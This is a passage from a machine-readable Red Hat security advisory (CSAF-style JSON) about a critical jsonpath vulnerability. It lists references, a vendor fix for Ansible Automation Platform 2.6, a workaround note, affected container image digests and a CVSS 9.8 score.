"summary": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243",
"url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034"
}
],
"release_date": "2026-02-09T05:00:09.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
